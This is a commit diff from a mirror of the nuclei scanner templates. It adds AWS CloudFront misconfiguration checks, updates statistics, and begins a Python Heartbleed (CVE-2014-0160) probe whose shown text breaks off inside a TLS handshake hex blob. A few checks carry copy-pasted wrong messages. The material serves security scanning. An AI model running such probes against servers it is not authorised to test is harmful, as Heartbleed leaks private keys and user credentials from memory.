daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into main

patch-13
Prince Chaddha 2024-11-04 00:38:14 +05:30 committed by GitHub
parent 4f386c2380 fe74a2f56b
commit 6ac3899944
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
256 changed files with 7801 additions and 6329 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

137
.new-additions
View File

@ -1,116 +1,23 @@
cloud/aws/dms/dms-multi-az.yaml
cloud/aws/dms/dms-public-access.yaml
cloud/aws/dms/dms-version-upgrade.yaml
cloud/aws/ebs/ebs-encryption-disabled.yaml
cloud/aws/efs/efs-encryption-disabled.yaml
cloud/aws/elasticache/cache-automatic-backups-disabled.yaml
cloud/aws/elasticache/cache-event-notification-disabled.yaml
cloud/aws/elasticache/cache-redis-encryption-disabled.yaml
cloud/aws/elasticache/cache-redis-multiaz-disabled.yaml
cloud/aws/firehose/firehose-server-destination-encryption.yaml
cloud/aws/firehose/firehose-server-side-encryption.yaml
cloud/aws/guardduty/guardduty-findings.yaml
cloud/aws/guardduty/guardduty-not-enabled.yaml
cloud/aws/guardduty/malware-protection-disabled.yaml
cloud/aws/guardduty/s3-protection-disabled.yaml
cloud/aws/inspector2/inspector2-disabled.yaml
cloud/aws/rds/rds-auto-minor-upgrade-disabled.yaml
cloud/aws/rds/rds-automated-backup-disabled.yaml
cloud/aws/rds/rds-backtrack-disabled.yaml
cloud/aws/rds/rds-cluster-protection-disabled.yaml
cloud/aws/rds/rds-copy-snap.yaml
cloud/aws/rds/rds-insights-disabled.yaml
cloud/aws/rds/rds-instance-autoscaling-disabled.yaml
cloud/aws/rds/rds-log-export-disabled.yaml
cloud/aws/rds/rds-multi-az.yaml
cloud/aws/rds/rds-public-access.yaml
cloud/aws/route53/route53-dns-query-disabled.yaml
cloud/aws/route53/route53-dnssec-signing-disabled.yaml
dast/cves/2024/CVE-2024-2961.yaml
http/cnvd/2024/CNVD-2024-38747.yaml
http/cves/2015/CVE-2015-8562.yaml
http/cves/2017/CVE-2017-5868.yaml
http/cves/2018/CVE-2018-7192.yaml
http/cves/2018/CVE-2018-7193.yaml
http/cves/2018/CVE-2018-7196.yaml
http/cves/2019/CVE-2019-8943.yaml
http/cves/2021/CVE-2021-38156.yaml
http/cves/2021/CVE-2021-45811.yaml
http/cves/2023/CVE-2023-1315.yaml
http/cves/2023/CVE-2023-1317.yaml
http/cves/2023/CVE-2023-1318.yaml
http/cves/2023/CVE-2023-2745.yaml
http/cves/2023/CVE-2023-38040.yaml
http/cves/2023/CVE-2023-39560.yaml
http/cves/2023/CVE-2023-40748.yaml
http/cves/2023/CVE-2023-40749.yaml
http/cves/2023/CVE-2023-40750.yaml
http/cves/2023/CVE-2023-40751.yaml
http/cves/2023/CVE-2023-40752.yaml
http/cves/2023/CVE-2023-40753.yaml
http/cves/2023/CVE-2023-40755.yaml
http/cves/2023/CVE-2023-40931.yaml
http/cves/2023/CVE-2023-43373.yaml
http/cves/2023/CVE-2023-5558.yaml
http/cves/2023/CVE-2023-5561.yaml
http/cves/2024/CVE-2016-9299.yaml
http/cves/2024/CVE-2024-22476.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
http/cves/2024/CVE-2024-32737.yaml
http/cves/2024/CVE-2024-32738.yaml
http/cves/2024/CVE-2024-32739.yaml
http/cves/2024/CVE-2024-35584.yaml
http/cves/2024/CVE-2024-3656.yaml
http/cves/2024/CVE-2024-39713.yaml
http/cves/2024/CVE-2024-43360.yaml
http/cves/2024/CVE-2024-44349.yaml
http/cves/2024/CVE-2024-4439.yaml
http/cves/2024/CVE-2024-45488.yaml
http/cves/2024/CVE-2024-46310.yaml
http/cves/2024/CVE-2024-48914.yaml
http/cves/2024/CVE-2024-49757.yaml
http/cves/2024/CVE-2024-5910.yaml
http/cves/2024/CVE-2024-8698.yaml
http/cves/2024/CVE-2024-9061.yaml
http/cves/2024/CVE-2024-9234.yaml
http/cves/2024/CVE-2024-9593.yaml
http/cves/2024/CVE-2024-9617.yaml
http/cves/2024/CVE-2024-9796.yaml
http/default-logins/apache/doris-default-login.yaml
http/default-logins/sato/sato-default-login.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/1password-scim-panel.yaml
http/exposed-panels/danswer-panel.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/nagios/nagios-logserver-panel.yaml
http/exposed-panels/olympic-panel.yaml
http/exposed-panels/onedev-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
http/exposed-panels/reolink-panel.yaml
http/exposed-panels/sqlpad-panel.yaml
http/exposed-panels/traccar-panel.yaml
http/exposed-panels/txadmin-panel.yaml
http/exposed-panels/usermin-panel.yaml
http/exposed-panels/veritas-netbackup-panel.yaml
http/exposed-panels/vmware-aria-panel.yaml
http/misconfiguration/installer/nagios-logserver-installer.yaml
http/misconfiguration/redpanda-console.yaml
http/misconfiguration/root-path-disclosure.yaml
http/misconfiguration/unauth-cyber-power-systems.yaml
http/takeovers/wasabi-bucket-takeover.yaml
http/technologies/accellion-detect.yaml
http/technologies/gradio-detect.yaml
http/technologies/lollms-webui-detect.yaml
http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/salesforce-b2c-commerce-webdav.yaml
cloud/aws/cloudfront/cloudfront-compress-object.yaml
cloud/aws/cloudfront/cloudfront-custom-certificates.yaml
cloud/aws/cloudfront/cloudfront-geo-restriction.yaml
cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml
cloud/aws/cloudfront/cloudfront-integrated-waf.yaml
cloud/aws/cloudfront/cloudfront-logging-disabled.yaml
cloud/aws/cloudfront/cloudfront-origin-shield.yaml
cloud/aws/cloudfront/cloudfront-security-policy.yaml
cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml
cloud/aws/cloudfront/cloudfront-viewer-policy.yaml
code/cves/2014/CVE-2014-0160.yaml
http/cves/2019/CVE-2019-1003000.yaml
http/cves/2024/CVE-2024-4841.yaml
http/cves/2024/CVE-2024-6420.yaml
http/exposed-panels/cyberpanel-panel.yaml
http/exposed-panels/quivr-panel.yaml
http/iot/ip-webcam.yaml
http/miscellaneous/azure-blob-core-detect.yaml
http/technologies/hubble-detect.yaml
http/technologies/localai-detect.yaml
http/technologies/pghero-detect.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
http/vulnerabilities/nagios/nagios-xi-xss.yaml
http/vulnerabilities/other/cyberpanel-rce.yaml
http/vulnerabilities/wordpress/application-pass-xss.yaml
http/vulnerabilities/wordpress/wp-footnote-xss.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
passive/cves/2024/CVE-2024-40711.yaml
http/vulnerabilities/backdoor/lottie-backdoor.yaml

20
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| cve | 2824 | dhiyaneshdk | 1456 | http | 8128 | info | 3910 | file | 402 |
| panel | 1225 | daffainfo | 866 | file | 402 | high | 2069 | dns | 25 |
| wordpress | 1057 | dwisiswant0 | 802 | cloud | 353 | medium | 1784 | | |
| exposure | 999 | princechaddha | 498 | workflows | 192 | critical | 1175 | | |
| xss | 975 | ritikchaddha | 479 | network | 137 | low | 284 | | |
| wp-plugin | 920 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
| tech | 736 | pdteam | 302 | ssl | 30 | | | | |
| misconfig | 718 | ricardomaia | 243 | dast | 26 | | | | |
| lfi | 716 | geeknik | 231 | dns | 22 | | | | |
**723 directories, 9654 files**.
**736 directories, 9771 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

11774
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

18
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| cve | 2824 | dhiyaneshdk | 1456 | http | 8128 | info | 3910 | file | 402 |
| panel | 1225 | daffainfo | 866 | file | 402 | high | 2069 | dns | 25 |
| wordpress | 1057 | dwisiswant0 | 802 | cloud | 353 | medium | 1784 | | |
| exposure | 999 | princechaddha | 498 | workflows | 192 | critical | 1175 | | |
| xss | 975 | ritikchaddha | 479 | network | 137 | low | 284 | | |
| wp-plugin | 920 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
| tech | 736 | pdteam | 302 | ssl | 30 | | | | |
| misconfig | 718 | ricardomaia | 243 | dast | 26 | | | | |
| lfi | 716 | geeknik | 231 | dns | 22 | | | | |

61
cloud/aws/cloudfront/cloudfront-compress-object.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-compress-object
info:
name: CloudFront Compress Objects Automatically
author: DhiyaneshDK
severity: low
description: |
Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are configured to automatically compress content for web requests that include "Accept-Encoding: gzip" in the request header, in order to increase the websites/web applications performance and reduce bandwidth costs.
impact: |
Disabling "Compress Objects Automatically" in CloudFront can lead to increased data transfer costs and slower page load times, negatively impacting user experience and performance.
remediation: |
Enable "Compress Objects Automatically" in CloudFront to reduce data transfer sizes, enhance loading speeds, and improve overall performance for end users.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/compress-objects-automatically.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].Compress' --region $region --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
# digest: 490a00463044022049dd48306c6c158a96f198e145cc789b3470759ea27f11f4eee8dcbcd1a02782022063234ed30fb1eb259bddcc79bef550ca731a8923594dadb47ae744ddceb508cf:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-custom-certificates.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-custom-certificates
info:
name: Cloudfront Custom SSL/TLS Certificates - In Use
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon CloudFront distributions are configured to use a custom SSL/TLS certificate instead of the default one.
impact: |
Failing to use custom SSL/TLS certificates in CloudFront can result in trust issues with end users, exposing your web content to man-in-the-middle attacks and potentially damaging your brand's reputation due to untrusted connection warnings.
remediation: |
Configure your Amazon CloudFront distribution to use custom SSL/TLS certificates to ensure secure and trusted connections for your users, enhancing data protection and maintaining brand integrity.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-distro-custom-tls.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/CNAMEs.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --region $region --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.CloudFrontDefaultCertificate' --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"Cloudfront Custom SSL/TLS Certificates " + distribution + " In Use"'
# digest: 4a0a00473045022100da635117b120204e1672952e41f6ee3ed6dabf0747f609179b0f67d5a69d075b02205b7689dcdc0580def61f7365313c333d14cab3be5e87ced20955c329501c674d:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-geo-restriction.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-geo-restriction
info:
name: CloudFront Geo Restriction - Not Enabled
author: DhiyaneshDK
severity: info
description: |
Ensure that geographic restriction is enabled for your Amazon CloudFront CDN distributions in order to allow or block viewers from specific locations (countries) from accessing your web content.
impact: |
Not enabling Geo Restriction in CloudFront exposes content to users from unauthorized regions, increasing the risk of content misuse, compliance violations, and potential security threats.
remediation: |
Enable Geo Restriction in CloudFront to control access to content based on geographic locations, ensuring only authorized users from designated regions can access specific resources.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/geo-restriction.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query "DistributionConfig.Restrictions.GeoRestriction.RestrictionType" --region $region --output text
matchers:
- type: word
words:
- "none"
extractors:
- type: dsl
dsl:
- '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
# digest: 4a0a004730450220142b520c987e8f2bcfdf0ae5bac12ebf324e825707c1ddd75291b2ff70b53f39022100ec5ac177b54af99c6215cf891d48ad55e8e7fead07e40e32ecbf13085ca6bf09:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-insecure-protocol
info:
name: CloudFront Insecure Origin SSL Protocols
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are not using insecure SSL protocols (i.e. SSLv3) for HTTPS communication between CloudFront edge locations and custom origins.
impact: |
Insecure SSL protocols for CloudFront origins can expose sensitive data to interception and compromise, increasing the risk of man-in-the-middle attacks.
remediation: |
Configure your CloudFront distribution to enforce the use of secure SSL/TLS protocols (TLS 1.2 or higher) for all origins and disable support for outdated protocols like SSLv3 and TLS 1.0/1.1.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-insecure-origin-ssl-protocols.html
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginSslProtocols.Items | []' --region $region --output json
matchers:
- type: word
words:
- "SSLv3"
extractors:
- type: dsl
dsl:
- '"CloudFront Uses SSLv3 Protocol in" + distribution'
# digest: 4b0a00483046022100fdc0ce1c8723e90fb04a9afeefa22c4a2688c89157b4f1c5c6be4a243dcf9213022100d12140b15551ef3d20a7877e4e31b370371ab0d4127a3bb56b53a6363387acd9:922c64590222798bb761d5b6d8e72950

67
cloud/aws/cloudfront/cloudfront-integrated-waf.yaml Normal file
View File

@ -0,0 +1,67 @@
id: cloudfront-integrated-waf
info:
name: CloudFront Integrated With WAF
author: DhiyaneshDK
severity: medium
description: |
Ensure that all your Amazon CloudFront distributions are integrated with the Amazon Web Application Firewall (WAF) service to protect against application-layer attacks that can compromise the security of your websites/web applications or place unnecessary load on them
impact: |
Lack of integration between CloudFront and a Web Application Firewall (WAF) increases vulnerability to web-based attacks, including DDoS, SQL injection, and cross-site scripting (XSS).
remediation: |
Integrate CloudFront with an appropriate Web Application Firewall (WAF) to filter and monitor HTTP requests, providing enhanced protection against common web threats.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-integrated-with-waf.html
- http://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.WebACLId' --region $region --output json
matchers-condition: and
matchers:
- type: word
words:
- '""'
- type: word
words:
- 'arn:'
negative: true
extractors:
- type: dsl
dsl:
- '"CloudFront Integrated With WAF " + distribution + " is Disabled"'
# digest: 4a0a00473045022100a36dcab2a207e696447d68b0dce85fe832262f87ce1b46b55dedec2d0d1211c902206af51e44f15794e01470f3e31dae926ca281d793cb43438e67acfa8bfa8b3525:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-logging-disabled.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-logging-disabled
info:
name: Cloudfront Logging Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that access (standard) logging is enabled for your Amazon CloudFront distributions in order to track all viewer requests for the web content delivered through the Content Delivery Network (CDN).
impact: |
Disabling CloudFront logging reduces visibility into traffic patterns, hinders incident response and forensic analysis, compromises compliance efforts, and limits troubleshooting capabilities, increasing security risks.
remediation: |
Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-logging-enabled.html
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Logging.Enabled' --region $region --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"Cloudfront Logging " + distribution + " is Disabled"'
# digest: 4a0a0047304502206dc958b5b8b2f929d7f5416fe53425745b6f54d4d8d2c929f92aa508189202aa0221008b22fee11b75ecdf6da6c22803d8a6b55552f8be2910f60ce5dccf686fb892b8:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-origin-shield.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-origin-shield
info:
name: CloudFront Origin Shield - Not Enabled
author: DhiyaneshDK
severity: info
description: |
Ensure that the Origin Shield performance optimization feature is enabled for all your Amazon CloudFront distributions in order to help reduce the load on your distribution's origin, improve its availability, and reduce its operating costs.
impact: |
Not enabling CloudFront Origin Shield can lead to increased load on your origin server, higher latency, and greater costs due to more frequent requests during traffic spikes.
remediation: |
Enable CloudFront Origin Shield for your distributions to optimize cache efficiency, reduce load on your origin server, and improve content delivery performance during high traffic periods.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/enable-origin-shield.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/origin-shield.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.Origins.Items[*].OriginShield.Enabled' --region $region --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"CloudFront Origin Shield " + distribution + " not Enabled"'
# digest: 4a0a00473045022032e6b219a62c0fa94878575c07b5a4e05b088c8784f3ffdd724353a64d73e165022100f8a3cd82c152bd084c703fe67574a40a91c12ba1372d1cd9c4c0e4584b72a4be:922c64590222798bb761d5b6d8e72950

65
cloud/aws/cloudfront/cloudfront-security-policy.yaml Normal file
View File

@ -0,0 +1,65 @@
id: cloudfront-security-policy
info:
name: CloudFront Security Policy
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon CloudFront distributions are using a security policy with minimum TLSv1.2 or TLSv1.3 and appropriate security ciphers for HTTPS viewer connections.
impact: |
Failing to use a security policy with a minimum of TLSv1.2 or TLSv1.3 and appropriate ciphers for HTTPS viewer connections in CloudFront can expose sensitive data to interception and reduce the overall security of your application.
remediation: |
Configure your Amazon CloudFront distributions to use a security policy that enforces a minimum of TLSv1.2 or TLSv1.3 and specifies secure ciphers for HTTPS viewer connections.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/security-policy.html
- https://aws.amazon.com/about-aws/whats-new/2017/09/amazon-cloudfront-now-lets-you-select-a-security-policy-with-minimum-tls-v1_1-1_2-and-security-ciphers-for-viewer-connections/
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.MinimumProtocolVersion' --region $region --output json
matchers:
- type: word
words:
- '"TLSv1"'
- '"TLSv1_2016"'
- '"TLSv1.1_2016"'
- '"TLSv1.2_2018"'
- '"TLSv1.2_2019"'
extractors:
- type: dsl
dsl:
- '"CloudFront Uses Insecure Protocols " + distribution'
# digest: 490a00463044022019cb76f463fd374301b04d91953274d0df2e3c81f325c2ca914ec8cd7292228a02206d121f3f2cb668cf74b765e168580e8d34c7367d81c680a9cea321b457a9f37e:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-traffic-unencrypted
info:
name: CloudFront Traffic To Origin Unencrypted
author: DhiyaneshDK
severity: medium
description: |
Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.
impact: |
Unencrypted traffic between CloudFront and custom origins can expose sensitive data during transmission, leading to potential data breaches and non-compliance with encryption standards.
remediation: |
Ensure that all communications between your Amazon CloudFront distributions and custom origins are encrypted by configuring them to use HTTPS, thereby securing the delivery of web content and meeting compliance requirements for encryption in transit.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginProtocolPolicy' --region $region --output json
matchers:
- type: word
words:
- '"http-only"'
extractors:
- type: dsl
dsl:
- '"CloudFront " + distribution + " uses HTTP Only"'
# digest: 4a0a004730450220510c7757a3c8d77dcafbd819fb087db60a3243f239bdbd580f241f16f493279002210099bb7f3694be216d0aac7e02bc4c8926ba258745185e6213f44a8695460a7cd2:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-viewer-policy.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-viewer-policy
info:
name: CloudFront Viewer Protocol Policy
author: DhiyaneshDK
severity: medium
description: |
Ensure that the communication between your Amazon CloudFront distribution and its viewers is encrypted using HTTPS in order to secure the delivery of your web content.
impact: |
Failing to enforce HTTPS for viewer connections in CloudFront can expose web content to interception and manipulation, compromising the security and integrity of sensitive data transmitted between users and the distribution
remediation: |
Configure your Amazon CloudFront distribution's viewer protocol policy to either redirect HTTP requests to HTTPS or require HTTPS connections exclusively, ensuring secure delivery of web content and protecting against potential data breaches.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/viewer-protocol-policy.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy' --output json --region $region
matchers:
- type: word
words:
- '"allow-all"'
extractors:
- type: dsl
dsl:
- '"CloudFront Viewer Policy " + distribution + " allows all"'
# digest: 4b0a00483046022100d710e5ab5c7940783bf341bf221f46d1cfe6638e4d33b69cc03a589e3cb0705302210084f5e59cda9f7b0e3fff5500b00eb922fae079e988ce96a49a04de2dc15f9cfc:922c64590222798bb761d5b6d8e72950

139
code/cves/2014/CVE-2014-0160.yaml Normal file
View File

@ -0,0 +1,139 @@
id: CVE-2014-0160
info:
name: OpenSSL Heartbleed Vulnerability
author: pussycat0x
severity: high
description: |
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.
reference:
- https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160
metadata:
verified: true
tags: cve,cve2014,openssl,heartbleed,code
variables:
url: "{{RootURL}}"
code:
- engine:
- py
- python3
source: |
import os
import struct
import socket
import time
import select
from urllib.parse import urlparse
def h2bin(x):
return bytes.fromhex(x.replace(' ', '').replace('\n', ''))
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
